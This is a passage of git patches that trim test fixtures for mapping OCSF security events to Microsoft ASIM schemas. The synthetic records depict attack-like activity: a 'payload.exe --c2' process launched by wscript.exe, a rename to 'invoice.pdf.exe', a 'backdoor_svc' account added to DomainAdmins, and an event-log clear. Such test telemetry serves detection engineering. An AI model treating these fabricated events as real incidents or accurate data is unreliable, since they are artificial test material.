+24,5 @@ SrcHostname: null, DstIpAddr: null, DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, name: "asim.dns", } diff --git a/microsoft/tests/asim/ocsf/event_log_activity.txt b/microsoft/tests/asim/ocsf/event_log_activity.txt index 2e3fde0..d9429a1 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.txt +++ b/microsoft/tests/asim/ocsf/event_log_activity.txt @@ -25,47 +25,5 @@ SrcIpAddr: null, TargetHostname: null, TargetIpAddr: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Clear", - category_uid: 1, - category_name: "System Activity", - class_uid: 1008, - class_name: "Event Log Activity", - type_uid: 100801, - type_name: "Event Log Activity: Clear", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 4, - severity: "High", - metadata: { - event_code: "1102", - log_name: "Security", - original_event_uid: "99001", - product: { - name: "Microsoft-Windows-Eventlog", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "WINHOST01.corp.local", - }, - actor: { - process: { - pid: 4660, - }, - session: { - uid_alt: "0xA1B2C3", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - }, name: "asim.audit_event", } diff --git a/microsoft/tests/asim/ocsf/file_system_activity.txt b/microsoft/tests/asim/ocsf/file_system_activity.txt index cf45713..2ff1ae7 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.txt +++ b/microsoft/tests/asim/ocsf/file_system_activity.txt @@ -20,37 +20,6 @@ TargetFilePath: "C:\\tmp\\payload.exe", TargetFileName: "payload.exe", TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - }, name: "asim.file_event", } { @@ -78,40 +47,5 @@ SrcFileName: "payload.exe", SrcFilePathType: "Windows Local", TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, - }, name: "asim.file_event", } diff --git a/microsoft/tests/asim/ocsf/group_management.txt b/microsoft/tests/asim/ocsf/group_management.txt index 7f01855..2777d0d 100644 --- a/microsoft/tests/asim/ocsf/group_management.txt +++ b/microsoft/tests/asim/ocsf/group_management.txt @@ -27,48 +27,5 @@ GroupIdType: "SID", SrcIpAddr: null, SrcHostname: null, - AdditionalFields: { - activity_id: 3, - activity_name: "Add User", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3006, - class_name: "Group Management", - type_uid: 300603, - type_name: "Group Management: Add User", - time: 2024-03-23T12:34:57Z, - severity_id: 1, - metadata: { - event_code: "4728", - original_event_uid: "98776", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - group: { - domain: "CORP", - name: "DomainAdmins", - uid: "S-1-5-21-3107921522-2185401913-891411500-512", - }, - user: { - name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, - }, name: "asim.user_management", } diff --git a/microsoft/tests/asim/ocsf/http_activity.txt b/microsoft/tests/asim/ocsf/http_activity.txt index cd66053..3cd81cb 100644 --- a/microsoft/tests/asim/ocsf/http_activity.txt +++ b/microsoft/tests/asim/ocsf/http_activity.txt @@ -18,36 +18,5 @@ Url: "https://example.org/index.html", HttpRequestMethod: "GET", EventResultDetails: "200", - AdditionalFields: { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, - }, name: "asim.web_session", } diff --git a/microsoft/tests/asim/ocsf/network_activity.txt b/microsoft/tests/asim/ocsf/network_activity.txt index 005e7cb..d712463 100644 --- a/microsoft/tests/asim/ocsf/network_activity.txt +++ b/microsoft/tests/asim/ocsf/network_activity.txt @@ -23,39 +23,5 @@ DstPortNumber: 443, SrcBytes: 100, DstBytes: 200, - AdditionalFields: { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, - }, name: "asim.network_session", } diff --git a/microsoft/tests/asim/ocsf/process_activity.txt b/microsoft/tests/asim/ocsf/process_activity.txt index 392d9ef..2261a94 100644 --- a/microsoft/tests/asim/ocsf/process_activity.txt +++ b/microsoft/tests/asim/ocsf/process_activity.txt @@ -25,63 +25,5 @@ TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", TargetUserId: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Launch", - category_uid: 1, - category_name: "System Activity", - class_uid: 1007, - class_name: "Process Activity", - type_uid: 100701, - type_name: "Process Activity: Launch", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - event_code: "4688", - original_event_uid: "98764", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "WINHOST01.corp.local", - }, - actor: { - process: { - pid: 4660, - name: "wscript.exe", - parent_process: { - pid: 520, - name: "explorer.exe", - }, - }, - session: { - uid_alt: "0xA1B2C3", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - process: { - pid: 6732, - name: "payload.exe", - path: "C:\\tmp\\payload.exe", - cmd_line: "payload.exe --c2 10.0.0.1", - parent_process: { - pid: 4660, - name: "wscript.exe", - }, - }, - }, name: "asim.process_event", } diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index c1069a4..db04bbc 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -10,4 +10,3 @@ ocsf::derive ocsf::cast microsoft::asim::map event=this name = @name -drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt index 6f7df95..2962cf9 100644 --- a/microsoft/tests/asim/windows.txt +++ b/microsoft/tests/asim/windows.txt @@ -35,104 +35,5 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: "Kerberos", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - actor: { - session: { - uid_alt: "0x0", - }, - user: { - domain: null, - name: null, - uid: "S-1-0-0", - }, - }, - auth_protocol: "Kerberos", - auth_protocol_id: 2, - category_name: "Identity & Access Management", - category_uid: 3, - class_name: "Authentication", - class_uid: 3002, - device: { - hostname: "DC01.corp.local", - }, - logon_type: "Network", - logon_type_id: 3, - metadata: { - event_code: "4624", - extensions: [ - { - name: "win", - }, - ], - log_format: "xml", - log_level: "0", - log_name: "Security", - log_version: "2", - logged_time: 2024-03-23T12:34:56.789012300Z, - original_event_uid: "98761", - product: { - name: "Microsoft-Windows-Security-Auditing", - uid: "{5770385F-C994-4D63-B9EC-B6FE73E0CE8A}", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", - raw_data_size: 1918, - session: { - uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", - uid_alt: "0xA1B2C3", - }, - severity: "Informational", - severity_id: 1, - src_endpoint: { - hostname: null, - ip: 10.0.0.42, - port: 49827, - }, - status: "Success", - status_id: 1, - time: 2024-03-23T12:34:56.789012300Z, - type_name: "Authentication: Logon", - type_uid: 300201, - unmapped: { - System: { - Task: 12544, - Keywords: "0x8020000000000000", - Correlation: { - ActivityID: "{abc123-def456}", - }, - Execution: { - ProcessID: 4, - ThreadID: 72, - }, - }, - EventData: { - LogonProcessName: "Kerberos", - TransmittedServices: null, - LmPackageName: null, - KeyLength: 0, - ProcessId: "0x0", - ProcessName: null, - ImpersonationLevel: "%%1833", - RestrictedAdminMode: null, - TargetOutboundUserName: null, - TargetOutboundDomainName: null, - VirtualAccount: "%%1843", - TargetLinkedLogonId: "0x0", - ElevatedToken: "%%1842", - }, - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, name: "asim.authentication", } From 4f926aec8c3cd8a604bf42ac4387fee4e67a675e Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 18:44:43 +0200 Subject: [PATCH 24/27] Trim ASIM OCSF test fixtures Remove redundant class filters from per-schema ASIM OCSF tests. Keep only the records each fixture intends to map, and drop single-event sorts that no longer affect output order. Assisted-by: GPT-5 (Codex) --- microsoft/tests/asim/ocsf/account_change.tql | 42 ----- microsoft/tests/asim/ocsf/dhcp_activity.tql | 158 ------------------ microsoft/tests/asim/ocsf/dns_activity.tql | 154 ----------------- .../tests/asim/ocsf/file_system_activity.tql | 120 ------------- .../tests/asim/ocsf/group_management.tql | 38 ----- microsoft/tests/asim/ocsf/http_activity.tql | 154 ----------------- .../tests/asim/ocsf/network_activity.tql | 151 ----------------- 7 files changed, 817 deletions(-) diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index 370e3fb..a99e0f5 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -34,49 +34,7 @@ from { name: "backdoor_svc", uid: "S-1-5-21-3107921522-2185401913-891411500-1500", }, -}, { - activity_id: 3, - activity_name: "Add User", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3006, - class_name: "Group Management", - type_uid: 300603, - type_name: "Group Management: Add User", - time: 2024-03-23T12:34:57Z, - severity_id: 1, - metadata: { - event_code: "4728", - original_event_uid: "98776", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: ["host"], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - group: { - domain: "CORP", - name: "DomainAdmins", - uid: "S-1-5-21-3107921522-2185401913-891411500-512", - }, - user: { - name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, } @name = "ocsf.account_change" -where class_uid == 3001 microsoft::asim::ocsf::map event=this name = @name -sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index ffb274f..afaba70 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -1,131 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, -}, { activity_id: 5, activity_name: "Ack", category_uid: 4, @@ -151,38 +24,7 @@ from { ip: 10.0.0.50, mac: "00:11:22:33:44:55", }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 4004 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index 327881f..f601bc8 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -1,101 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { activity_id: 1, activity_name: "Query", category_uid: 4, @@ -125,64 +28,7 @@ from { src_endpoint: { ip: 10.0.0.1, }, -}, { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 4003 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index f1792ec..ef53ca8 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -62,127 +62,7 @@ from { path: "C:\\tmp\\invoice.pdf.exe", name: "invoice.pdf.exe", }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, -}, { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 1001 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index a3adc02..b9df034 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -1,40 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3001, - class_name: "Account Change", - type_uid: 300101, - type_name: "Account Change: Create", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - metadata: { - event_code: "4720", - original_event_uid: "98767", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: ["host"], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - user: { - domain: "CORP", - name: "backdoor_svc", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, -}, { activity_id: 3, activity_name: "Add User", category_uid: 3, @@ -76,7 +40,5 @@ from { }, } @name = "ocsf.group_management" -where class_uid == 3006 microsoft::asim::ocsf::map event=this name = @name -sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index a6e0fab..93c2bac 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -1,157 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, -}, { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, -}, { activity_id: 3, activity_name: "Get", category_uid: 4, @@ -182,7 +29,6 @@ from { code: 200, }, } -where class_uid == 4002 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index e590998..455919e 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql +++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -1,68 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { activity_id: 6, activity_name: "Traffic", category_uid: 4, @@ -95,94 +31,7 @@ from { bytes_out: 100, bytes_in: 200, }, -}, { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, -}, { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 4001 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid From 68961fd888b5149c9c3ab0d45c44b772c4acbd91 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Fri, 12 Jun 2026 11:46:39 +0200 Subject: [PATCH 25/27] Flatten ASIM OCSF helper namespace Move the shared ASIM OCSF common mapper setup out of the helpers namespace. The package only has one helper UDO here, so callers can use microsoft::asim::ocsf::common directly. Assisted-by: GPT-5 (Codex) --- microsoft/operators/asim/ocsf/account_change.tql | 2 +- microsoft/operators/asim/ocsf/authentication.tql | 2 +- microsoft/operators/asim/ocsf/authorize_session.tql | 2 +- microsoft/operators/asim/ocsf/{helpers => }/common.tql | 0 microsoft/operators/asim/ocsf/compliance_finding.tql | 2 +- microsoft/operators/asim/ocsf/detection_finding.tql | 2 +- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/operators/asim/ocsf/dns_activity.tql | 2 +- microsoft/operators/asim/ocsf/entity_management.tql | 2 +- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +- microsoft/operators/asim/ocsf/file_system_activity.tql | 2 +- 